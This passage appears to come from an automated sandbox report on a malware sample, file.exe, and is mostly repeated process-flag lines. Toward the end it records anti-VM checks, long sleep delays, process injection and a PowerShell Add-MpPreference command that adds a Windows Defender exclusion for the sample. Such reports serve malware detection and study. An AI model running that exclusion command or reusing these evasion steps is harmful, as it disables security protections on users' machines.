Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 23C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 23C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 7380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 8380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 8530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 9530000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6218			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3518			Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 7544	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7720	Thread sleep time: -420000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

3_2_00403D74

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: file.exe, 00000000.00000002.1890192784.00000000008B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\R
Source: file.exe, 00000003.00000002.3131214970.0000000001158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]

3_2_0040317B

Source: C:\Users\user\Desktop\file.exe

Code function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,

3_2_00402B7C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
